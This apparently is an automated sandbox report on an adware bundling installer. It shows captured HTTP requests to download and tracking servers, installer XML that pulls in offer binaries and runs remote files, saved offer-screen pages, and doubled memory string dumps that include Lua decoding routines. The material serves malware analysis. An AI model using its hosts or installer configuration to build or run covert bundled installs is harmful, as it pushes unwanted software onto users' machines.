From: "Saved by Windows Internet Explorer 9"..Subject: 628 by 282 Icy Offer..Date: Mon, 7 Jan 2013 11:23:06 -0500..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0010_01CDECC9.5D450B40"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0010_01CDECC9.5D450B40..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\strongvault_tidy_double628.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" =.."hXXp://VVV.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" =.."http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD>..<SCRIPT type=3D"text/javascript" =..src=3D"file:///C:/offerscreen/knockout-2.0.js"></SCRIPT>..<SCRIPT type=3D"text/javascript" =..src=3D"file:///C:/offerscreen/AutoFeatureModel.js"></SCRIPT>..<TITLE>628 by 282 Icy Offer</TITLE>..<META content=3D"text/html; charset=3DUTF-8" =..http-equiv=3D"Content-Type"><!--=20..Edited by: Insert Initials & Date..Template Name: 628_Icy_2col_toolbar_EULA.php..-->..<STYLE>=0A=../* Overall page settings... */=0A=..=0A=..body {background-color:#fff;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#707271;}=0A=..#content {width:628px;height:282px; overflow:hidden; =..backgro
<<< skipped >>>
GET /products/BM2/combos/playthru_tidy_double_628_3.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "8a3a08bba5a986be972f7f21967d2a1d:1438700316"
Last-Modified: Tue, 04 Aug 2015 14:58:36 GMT
Accept-Ranges: bytes
Content-Length: 68655
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: 628 by 282 Icy Offer..Date: Thu, 11 Sep 2014 14:39:31 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0007_01CFCDCE.32759F00"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0007_01CFCDCE.32759F00..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\stormwatch_tidy_double_628_2.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" =.."http://VVV.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">..<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" =.."hXXp://VVV.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><HTML><HEAD><=..META=20..content=3D"IE=3D11.0000" http-equiv=3D"X-UA-Compatible">..<TITLE>628 by 282 Icy Offer</TITLE>=20..<META http-equiv=3D"X-UA-Compatible" content=3D"IE=3D11.0000">=20..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>..=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3DUTF-8"><!-- =0A=..=0A=..Edited by: Insert Initials & Date=0A=..Template Name: 628_Icy_2col_toolbar_EULA.php=0A=..=0A=..-->=20..<STYLE>BODY {=0A=...PADDING-BOTTOM: 0px; BACK
<<< skipped >>>
GET /checksuminstall?checksum=17679 HTTP/1.1
Accept-Encoding: identify, enc(RC4/sha1:dc724af1), enc(RC4/sha1:eb7eb628), enc(RC4/sha1:66ed45ce), enc(RC4/sha1:39443636)
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: service.downloadadmin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Transfer-Encoding: chunked
Date: Tue, 15 Dec 2015 00:32:59 GMT
Age: 0
X-Cache: MISS
008000..<?xml version="1.0" encoding="UTF-8" standalone="yes"?>.<Installer>. <Bundle>. <CustomParameter Name="ProductName">@ProductName</CustomParameter>. <CustomParameter Name="ProductFileSize">@{ProductFileSize|1mb}</CustomParameter>. <CustomParameter Name="ProductTos">@ProductTos</CustomParameter>. <CustomParameter Name="PrivacyUrl">@PrivacyUrl</CustomParameter>. <CustomParameter Name="bm.plain-thanks">true</CustomParameter>. <File Action="Run before Offer" Destination="" DirMode="false" FileType="Content" ForceCreate="true" Options="@StartTrackingUrl" Scramble="false" ShowFolder="false" SourceDir="" SourceFile="hXXp://mirror.downloadmanager145.com/binstallers/BM2/api/do_tracking_hit.lua" WaitForExe="false" id="file-2"/>. <LinkBelowEula>false</LinkBelowEula>. <OptInDefault>false</OptInDefault>. <ProductBinary embed="false" msioptions="@ProductMsiOptions" options="@ProductOptions">@ProductBinaryUrl</ProductBinary>. <ProductEula comboPrimary="false" embed="false">hXXp://mirror.downloadnet1210.com/binstallers/BM2/adknowledge/ipage/adknowledge_3.mht</ProductEula>. <Primary>true</Primary>. <ProductId>1175439</ProductId>. <ProductName>@{ProductName|Adknowledge}</ProductName>. <Scramble>false</Scramble>. </Bundle>. <Bundle&g
<<< skipped >>>
GET /env?browserVersion=11&osVersion=7&browserName=IE&c=fw35&variation=&pid=adknowledge&aid=adk&country=US&productKey=&s=fw35_300x250display5128768&brand=adknowledge.com&bc=1197303&osName=Windows HTTP/1.1
Accept-Encoding: identify, enc(RC4/sha1:dc724af1), enc(RC4/sha1:eb7eb628), enc(RC4/sha1:66ed45ce), enc(RC4/sha1:39443636)
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: service.downloadadmin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/xml;charset=UTF-8
Transfer-Encoding: chunked
Date: Tue, 15 Dec 2015 00:33:06 GMT
Age: 0
X-Cache: MISS
001827..<?xml version="1.0" encoding="UTF-8" standalone="yes"?><Installer><Environment><Entry name="over-threshold:PremierOpinion (US) (1457)">true</Entry><Entry name="over-threshold:PremierOpinion (US) (1456)">true</Entry><Entry name="over-threshold:PremierOpinion (US) (1449)">true</Entry><Entry name="over-threshold:Optimizer Pro (US)">true</Entry><Entry name="over-threshold:Super Optimizer (US)">true</Entry><Entry name="over-threshold:PremierOpinion (UK)">true</Entry><Entry name="over-threshold:Super Optimizer (GB)">true</Entry><Entry name="over-threshold:Web Bar (GB)">true</Entry><Entry name="over-threshold:Web Bar (AU)">true</Entry><Entry name="over-threshold:Optimizer Pro (AR)">true</Entry><Entry name="over-threshold:Optimizer Pro (MX)">true</Entry><Entry name="over-threshold:Optimizer Pro (BR)">true</Entry><Entry name="over-threshold:Optimizer Pro (TR)">true</Entry><Entry name="over-threshold:Super Optimizer (DE)">true</Entry><Entry name="over-threshold:Super Optimizer (IN)">true</Entry><Entry name="over-threshold:Super Optimizer (RU)">true</Entry><Entry name="over-threshold:Super Optimizer (CN)">true</Entry><Entry name="over-threshold:Super Optimizer (ES)">true</Entry><Entry name="over-threshold:Super Optimizer (CH)">true</Entry><Entry name="over-threshold:Sup
<<< skipped >>>
Map
The Malware connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_580:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
PSSSSSSh
PSSSSSSh
6HdH.ls@zSNqT{hff)@ #
6HdH.ls@zSNqT{hff)@ #
advapi32.dll
advapi32.dll
debug.pdb
debug.pdb
comdlg32.dll
comdlg32.dll
SetNamedPipeHandleState
SetNamedPipeHandleState
CreateNamedPipeA
CreateNamedPipeA
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
GDI32.dll
GDI32.dll
USER32.dll
USER32.dll
msvcrt.dll
msvcrt.dll
_acmdln
_acmdln
_amsg_exit
_amsg_exit
ole32.dll
ole32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteExA
ShellExecuteExA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
55555555
55555555
lua51.dll
lua51.dll
CoCreateInstance failed(rc=%d)
CoCreateInstance failed(rc=%d)
All Files|*.*
All Files|*.*
Error creating ShellLink(rc=%d)
Error creating ShellLink(rc=%d)
CryptDuplicateKey
CryptDuplicateKey
CryptDeriveKey
CryptDeriveKey
CryptDestroyKey
CryptDestroyKey
luabridge.dll
luabridge.dll
shared_library.dll
shared_library.dll
luabridge.config
luabridge.config
luabridge.net
luabridge.net
resources.js
resources.js
luabridge.nsis
luabridge.nsis
444444444
444444444
%d.%d.%d
%d.%d.%d
win32.shell
win32.shell
luabridge.win32
luabridge.win32
__LOCALEXPORTS
__LOCALEXPORTS
luabridge.registry
luabridge.registry
111111111
111111111
./lua51.dll
./lua51.dll
local rshift,lshift,band=bit.rshift,bit.lshift,bit.band
local rshift,lshift,band=bit.rshift,bit.lshift,bit.band
local tohex=bit.tohex;
local tohex=bit.tohex;
local dict=ffi.new("char[?]",64)
local dict=ffi.new("char[?]",64)
function M.setSymbols(symbols)
function M.setSymbols(symbols)
ffi.copy(dict,symbols,64);
ffi.copy(dict,symbols,64);
seg = seg .. string.char(dict[bits]);
seg = seg .. string.char(dict[bits]);
seg = seg .. string.char(dict[bits]);
seg = seg .. string.char(dict[bits]);
table.insert(buf,seg);
table.insert(buf,seg);
seg=string.char(dict[idx]);
seg=string.char(dict[idx]);
seg=seg .. string.char(dict[bits]);
seg=seg .. string.char(dict[bits]);
table.insert(buf,seg)
table.insert(buf,seg)
table.insert(buf,({"",string.rep(placeholder,2),placeholder})[(#data % 3) 1])
table.insert(buf,({"",string.rep(placeholder,2),placeholder})[(#data % 3) 1])
return table.concat(buf);
return table.concat(buf);
local block=ffi.new("char[?]",block_sz);
local block=ffi.new("char[?]",block_sz);
function M.unb64(data)
function M.unb64(data)
table.insert(buf,ffi.string(block,p));
table.insert(buf,ffi.string(block,p));
local seg=ffi.string(block,p);
local seg=ffi.string(block,p);
--print("Append ",oldp,eqs,seg,ffi.string(block,oldp));
--print("Append ",oldp,eqs,seg,ffi.string(block,oldp));
table.insert(buf,seg);
table.insert(buf,seg);
return table.concat(buf)
return table.concat(buf)
M.setSymbols(DEF_DICT);
M.setSymbols(DEF_DICT);
function M.defaultDict()
function M.defaultDict()
M.setSymbols(DEF_DICT);
M.setSymbols(DEF_DICT);
M.unfilter = M.unb64
M.unfilter = M.unb64
M.setSymbols(loadarg);
M.setSymbols(loadarg);
return M.unb64;
return M.unb64;
Press any key to continue
Press any key to continue
require("logging").loggerFor("bundle_manager").Info("RunLoop Exited .. Cleaning Up");
require("logging").loggerFor("bundle_manager").Info("RunLoop Exited .. Cleaning Up");
return require('cleanup').runCleanup()
return require('cleanup').runCleanup()
dialog.image
dialog.image
resources.nsis
resources.nsis
./extramod.dll
./extramod.dll
%d.%.%d
%d.%.%d
luabridge.classes
luabridge.classes
resources.binlib
resources.binlib
resources.overlay
resources.overlay
luabridge.fs
luabridge.fs
mime.core
mime.core
dialog.html
dialog.html
resources.compressed
resources.compressed
key_duplicate
key_duplicate
key_encrypt
key_encrypt
777777777
777777777
%s expected data in index [1]
%s expected data in index [1]
key_destroy
key_destroy
Win32.Crypt.Key
Win32.Crypt.Key
derive_key
derive_key
Win32.Crypt.Hash
Win32.Crypt.Hash
key_decrypt
key_decrypt
provider_dervice_key
provider_dervice_key
%s expected table argument
%s expected table argument
default_key
default_key
bad argument #%d to %s('%s' expected)
bad argument #%d to %s('%s' expected)
Win32.Crypto.Provider
Win32.Crypto.Provider
%s expected 'length' with lightuserdata
%s expected 'length' with lightuserdata
%s
%s
99999999
99999999
miniz.DeflateZStream
miniz.DeflateZStream
inflateInit() failed (rc=%s)
inflateInit() failed (rc=%s)
deflate() failed(rc=%d)
deflate() failed(rc=%d)
Unsupported filter input(string|nil) expected
Unsupported filter input(string|nil) expected
miniz.InflateZStream
miniz.InflateZStream
inflate() failed(rc=%d)
inflate() failed(rc=%d)
deflateInit() failed (rc=%s)
deflateInit() failed (rc=%s)
Mime 1.0.3
Mime 1.0.3
zcÃ
zcÃ
version="61.6.7.6620"
version="61.6.7.6620"
setup.exe
setup.exe
61.6.7.6620
61.6.7.6620
%original file name%.exe_928:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
PSSSSSSh
PSSSSSSh
6HdH.ls@zSNqT{hff)@ #
6HdH.ls@zSNqT{hff)@ #
advapi32.dll
advapi32.dll
debug.pdb
debug.pdb
comdlg32.dll
comdlg32.dll
SetNamedPipeHandleState
SetNamedPipeHandleState
CreateNamedPipeA
CreateNamedPipeA
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
GDI32.dll
GDI32.dll
USER32.dll
USER32.dll
msvcrt.dll
msvcrt.dll
_acmdln
_acmdln
_amsg_exit
_amsg_exit
ole32.dll
ole32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteExA
ShellExecuteExA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
55555555
55555555
lua51.dll
lua51.dll
CoCreateInstance failed(rc=%d)
CoCreateInstance failed(rc=%d)
All Files|*.*
All Files|*.*
Error creating ShellLink(rc=%d)
Error creating ShellLink(rc=%d)
CryptDuplicateKey
CryptDuplicateKey
CryptDeriveKey
CryptDeriveKey
CryptDestroyKey
CryptDestroyKey
luabridge.dll
luabridge.dll
shared_library.dll
shared_library.dll
luabridge.config
luabridge.config
luabridge.net
luabridge.net
resources.js
resources.js
luabridge.nsis
luabridge.nsis
444444444
444444444
%d.%d.%d
%d.%d.%d
win32.shell
win32.shell
luabridge.win32
luabridge.win32
__LOCALEXPORTS
__LOCALEXPORTS
luabridge.registry
luabridge.registry
111111111
111111111
./lua51.dll
./lua51.dll
local rshift,lshift,band=bit.rshift,bit.lshift,bit.band
local rshift,lshift,band=bit.rshift,bit.lshift,bit.band
local tohex=bit.tohex;
local tohex=bit.tohex;
local dict=ffi.new("char[?]",64)
local dict=ffi.new("char[?]",64)
function M.setSymbols(symbols)
function M.setSymbols(symbols)
ffi.copy(dict,symbols,64);
ffi.copy(dict,symbols,64);
seg = seg .. string.char(dict[bits]);
seg = seg .. string.char(dict[bits]);
seg = seg .. string.char(dict[bits]);
seg = seg .. string.char(dict[bits]);
table.insert(buf,seg);
table.insert(buf,seg);
seg=string.char(dict[idx]);
seg=string.char(dict[idx]);
seg=seg .. string.char(dict[bits]);
seg=seg .. string.char(dict[bits]);
table.insert(buf,seg)
table.insert(buf,seg)
table.insert(buf,({"",string.rep(placeholder,2),placeholder})[(#data % 3) 1])
table.insert(buf,({"",string.rep(placeholder,2),placeholder})[(#data % 3) 1])
return table.concat(buf);
return table.concat(buf);
local block=ffi.new("char[?]",block_sz);
local block=ffi.new("char[?]",block_sz);
function M.unb64(data)
function M.unb64(data)
table.insert(buf,ffi.string(block,p));
table.insert(buf,ffi.string(block,p));
local seg=ffi.string(block,p);
local seg=ffi.string(block,p);
--print("Append ",oldp,eqs,seg,ffi.string(block,oldp));
--print("Append ",oldp,eqs,seg,ffi.string(block,oldp));
table.insert(buf,seg);
table.insert(buf,seg);
return table.concat(buf)
return table.concat(buf)
M.setSymbols(DEF_DICT);
M.setSymbols(DEF_DICT);
function M.defaultDict()
function M.defaultDict()
M.setSymbols(DEF_DICT);
M.setSymbols(DEF_DICT);
M.unfilter = M.unb64
M.unfilter = M.unb64
M.setSymbols(loadarg);
M.setSymbols(loadarg);
return M.unb64;
return M.unb64;
Press any key to continue
Press any key to continue
require("logging").loggerFor("bundle_manager").Info("RunLoop Exited .. Cleaning Up");
require("logging").loggerFor("bundle_manager").Info("RunLoop Exited .. Cleaning Up");
return require('cleanup').runCleanup()
return require('cleanup').runCleanup()
dialog.image
dialog.image
resources.nsis
resources.nsis
./extramod.dll
./extramod.dll
%d.%.%d
%d.%.%d
luabridge.classes
luabridge.classes
resources.binlib
resources.binlib
resources.overlay
resources.overlay
luabridge.fs
luabridge.fs
mime.core
mime.core
dialog.html
dialog.html
resources.compressed
resources.compressed
key_duplicate
key_duplicate
key_encrypt
key_encrypt
777777777
777777777
%s expected data in index [1]
%s expected data in index [1]
key_destroy
key_destroy
Win32.Crypt.Key
Win32.Crypt.Key
derive_key
derive_key
Win32.Crypt.Hash
Win32.Crypt.Hash
key_decrypt
key_decrypt
provider_dervice_key
provider_dervice_key
%s expected table argument
%s expected table argument
default_key
default_key
bad argument #%d to %s('%s' expected)
bad argument #%d to %s('%s' expected)
Win32.Crypto.Provider
Win32.Crypto.Provider
%s expected 'length' with lightuserdata
%s expected 'length' with lightuserdata
%s
%s
99999999
99999999
miniz.DeflateZStream
miniz.DeflateZStream
inflateInit() failed (rc=%s)
inflateInit() failed (rc=%s)
deflate() failed(rc=%d)
deflate() failed(rc=%d)
Unsupported filter input(string|nil) expected
Unsupported filter input(string|nil) expected
miniz.InflateZStream
miniz.InflateZStream
inflate() failed(rc=%d)
inflate() failed(rc=%d)
deflateInit() failed (rc=%s)
deflateInit() failed (rc=%s)
Mime 1.0.3
Mime 1.0.3
zcÃ
zcÃ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp/h0nthn80NmAxFi2CggC
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp/h0nthn80NmAxFi2CggC
c:\%original file name%.exe
c:\%original file name%.exe
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
version="61.6.7.6620"
version="61.6.7.6620"
setup.exe
setup.exe
61.6.7.6620
61.6.7.6620